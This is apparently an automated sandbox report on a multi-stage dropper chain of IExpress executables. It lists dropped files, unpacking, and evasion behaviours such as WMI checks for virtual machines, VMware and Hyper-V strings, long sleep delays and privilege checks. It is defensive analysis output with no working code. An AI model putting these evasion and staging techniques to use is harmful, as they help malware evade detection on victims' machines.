                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,5_2_004019F0
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCommand line argument: Kernel32.dll0_2_00E82BFB
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeCommand line argument: Kernel32.dll1_2_000C2BFB
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeCommand line argument: Kernel32.dll2_2_001F2BFB
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeCommand line argument: Kernel32.dll3_2_00DE2BFB
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCommand line argument: 08A5_2_00413780
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeAutomated click: OK
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeAutomated click: OK
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeAutomated click: OK
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: iOqzwbUlln.exeStatic file information: File size 1129984 > 1048576
                    Source: iOqzwbUlln.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x10b800
                    Source: iOqzwbUlln.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: iOqzwbUlln.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: iOqzwbUlln.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: iOqzwbUlln.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: iOqzwbUlln.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: iOqzwbUlln.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: iOqzwbUlln.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                    Source: iOqzwbUlln.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: 'C:\pacokicewiyo4-jub\cuhepasax\lalakexinej68\viz62 neg.pdb0Xp source: stL82bL52.exe, 00000002.00000003.316888493.000000000452A000.00000004.00000020.00020000.00000000.sdmp, mlf76Mf25.exe.2.dr
                    Source: Binary string: wextract.pdb source: iOqzwbUlln.exe, stL82bL52.exe.1.dr, sQm37qN82.exe.2.dr, szV94FU13.exe.0.dr
                    Source: Binary string: wextract.pdbGCTL source: iOqzwbUlln.exe, stL82bL52.exe.1.dr, sQm37qN82.exe.2.dr, szV94FU13.exe.0.dr
                    Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: sQm37qN82.exe, 00000003.00000003.317740077.00000000045A5000.00000004.00000020.00020000.00000000.sdmp, iDa05Vg46.exe, 00000004.00000000.317923256.0000000000322000.00000002.00000001.01000000.00000007.sdmp, iDa05Vg46.exe.3.dr
                    Source: Binary string: _.pdb source: kGO12fD60.exe, 00000005.00000003.351298943.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.407000586.0000000004BB0000.00000004.08000000.00040000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402621555.00000000021C6000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\pacokicewiyo4-jub\cuhepasax\lalakexinej68\viz62 neg.pdb source: stL82bL52.exe, 00000002.00000003.316888493.000000000452A000.00000004.00000020.00020000.00000000.sdmp, mlf76Mf25.exe.2.dr
                    Source: Binary string: C:\vicirulupixe-he.pdb source: szV94FU13.exe, 00000001.00000003.315638424.0000000004391000.00000004.00000020.00020000.00000000.sdmp, sQm37qN82.exe, 00000003.00000003.317740077.00000000045A5000.00000004.00000020.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000000.341977935.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, kGO12fD60.exe.3.dr, nAT03lr78.exe.1.dr
                    Source: Binary string: WC:\vicirulupixe-he.pdb0Xp source: szV94FU13.exe, 00000001.00000003.315638424.0000000004391000.00000004.00000020.00020000.00000000.sdmp, sQm37qN82.exe, 00000003.00000003.317740077.00000000045A5000.00000004.00000020.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000000.341977935.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, kGO12fD60.exe.3.dr, nAT03lr78.exe.1.dr

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeUnpacked PE file: 5.2.kGO12fD60.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeUnpacked PE file: 5.2.kGO12fD60.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCode function: 0_2_00E8724D push ecx; ret 0_2_00E87260
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeCode function: 1_2_000C724D push ecx; ret 1_2_000C7260
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeCode function: 2_2_001F724D push ecx; ret 2_2_001F7260
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeCode function: 3_2_00DE724D push ecx; ret 3_2_00DE7260
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_0041C40C push cs; iretd 5_2_0041C4E2
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_00423149 push eax; ret 5_2_00423179
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_0041C50E push cs; iretd 5_2_0041C4E2
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_004231C8 push eax; ret 5_2_00423179
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_0040E21D push ecx; ret 5_2_0040E230
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_0041C6BE push ebx; ret 5_2_0041C6BF
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCode function: 0_2_00E8202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00E8202A
                    Source: rWE40pD80.exe.0.drStatic PE information: 0xCD858A03 [Fri Apr 7 08:14:59 2079 UTC]
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeFile created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nAT03lr78.exeJump to dropped file
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeFile created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeJump to dropped file
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\mlf76Mf25.exeJump to dropped file
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCode function: 0_2_00E81AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00E81AE8
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeCode function: 1_2_000C1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_000C1AE8
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeCode function: 2_2_001F1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,2_2_001F1AE8
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeCode function: 3_2_00DE1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,3_2_00DE1AE8
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe TID: 2484Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe TID: 4708Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe TID: 2788Thread sleep count: 3654 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe TID: 3508Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,5_2_004019F0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeWindow / User API: threadDelayed 3654Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-2575
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-2569
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2453
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP002.TMP\mlf76Mf25.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: kGO12fD60.exe, 00000005.00000002.408105242.0000000005B6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: kGO12fD60.exe, 00000005.00000002.408105242.0000000005B6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMware856YYPNRWin32_VideoControllerLZUZ_F63VideoController120060621000000.000000-0001166438.display.infMSBDAGEOAR6R2PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors6RZ8VXYCPROKI
                    Source: kGO12fD60.exe, 00000005.00000002.408105242.0000000005B6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCode function: 0_2_00E85467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00E85467
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCode function: 0_2_00E82390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00E82390
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeCode function: 1_2_000C2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_000C2390
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeCode function: 2_2_001F2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_001F2390
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeCode function: 3_2_00DE2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,3_2_00DE2390
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,5_2_004019F0
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCode function: 0_2_00E8202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00E8202A
